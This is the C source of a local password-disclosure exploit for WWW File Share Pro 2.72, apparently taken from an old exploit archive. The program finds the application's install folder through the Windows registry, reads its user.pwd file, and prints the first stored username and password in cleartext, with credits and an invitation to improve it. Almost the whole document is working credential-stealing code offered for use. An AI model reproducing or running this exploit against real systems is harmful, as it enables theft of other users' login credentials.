home *** CD-ROM | disk | FTP | other *** search
- /*****************************************************************
-
- WWW File Share Pro 2.72 Local Exploit by Kozan
-
- Application: WWW File Share Pro 2.72
- Vendor:LionMax Software
- http://www.lionmax.com/
-
- Vulnerable Description: WWW File Share Pro 2.72 discloses passwords
- to local users.
-
- Discovered & Coded by: Kozan
- Credits to ATmaCA
- Web : www.netmagister.com
- Web2: www.spyinstructors.com
- Mail: kozan[at]netmagister[dot]com
-
- *****************************************************************/
-
- #include <windows.h>
- #include <stdio.h>
- #include <string.h>
-
- #define BUFSIZE 100
- HKEY hKey;
- char prgfiles[BUFSIZE];
- DWORD dwBufLen=BUFSIZE;
- LONG lRet;
-
- char *username, *password;
-
- int adresal(char *FilePath,char *Str)
- {
- char kr;
- int Sayac=0;
- int Offset=-1;
- FILE *di;
- di=fopen(FilePath,"rb");
-
- if( di == NULL )
- {
- fclose(di);
- return -1;
- }
-
- while(!feof(di))
- {
- Sayac++;
- for(int i=0;i<strlen(Str);i++)
- {
- kr=getc(di);
- if(kr != Str[i])
- {
- if( i>0 )
- {
- fseek(di,Sayac+1,SEEK_SET);
- }
- break;
- }
- if( i > ( strlen(Str)-2 ) )
- {
- Offset = ftell(di)-strlen(Str);
- fclose(di);
- return Offset;
- }
- }
- }
- fclose(di);
- return -1;
- }
-
- char *oku(char *FilePath)
- {
-
- FILE *di;
- char cr;
-
- int i=0;
- char Feature[500];
-
- if( (di=fopen(FilePath,"rb")) == NULL )
- return "";
-
- fseek(di,0,SEEK_SET);
-
- while(!feof(di))
- {
- cr=getc(di);
- if(cr == ',') break;
-
- Feature[i] = cr;
- i++;
- }
-
- Feature[i] = '\0';
- fclose(di);
- return Feature;
- }
-
- char *oku2(char *FilePath,char *Str)
- {
-
- FILE *di;
- char cr;
- int i=0;
- char Feature[500];
-
- int Offset = adresal(FilePath,Str);
-
- if( Offset == -1 )
- return "";
-
- if( (di=fopen(FilePath,"rb")) == NULL )
- return "";
-
- fseek(di,Offset+strlen(Str),SEEK_SET);
-
- while(!feof(di))
- {
- cr=getc(di);
- if(cr == ',') break;
-
- Feature[i] = cr;
- i++;
- }
-
- Feature[i] = '\0';
- fclose(di);
- return Feature;
- }
-
- int main(void)
- {
- if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
- "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
- 0,
- KEY_QUERY_VALUE,
- &hKey) == ERROR_SUCCESS)
- {
-
- lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL,
- NULL,
- (LPBYTE) prgfiles, &dwBufLen);
-
- if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
- {
- RegCloseKey(hKey);
- printf("An error occured!\n");
- return 0;
- }
-
- RegCloseKey(hKey);
-
- }
- else
- {
- RegCloseKey(hKey);
- printf("An error occured!\n");
- return 0;
- }
-
- strcat(prgfiles,"\\WWW File Share Pro\\user.pwd");
-
- printf("WWW File Share Pro 2.72 Local Exploit by Kozan\n");
- printf("Credits to ATmaCA\n");
- printf("www.netmagister.com - www.spyinstructors.com \n\n");
- printf("This exploit only shows the first record.\n");
- printf("You may improve it freely...\n\n");
-
- try
- {
- username = oku(prgfiles);
- printf("Username1: %s\n",username);
- char password1_temp[BUFSIZE];
- wsprintf(password1_temp,"%s%c",username,0x2C);
- password=oku2(prgfiles,password1_temp);
- printf("Password1: %s\n",password);
-
- }catch(...){ printf("An error occured!\n"); return 0; }
-
- return 0;
-
- }
-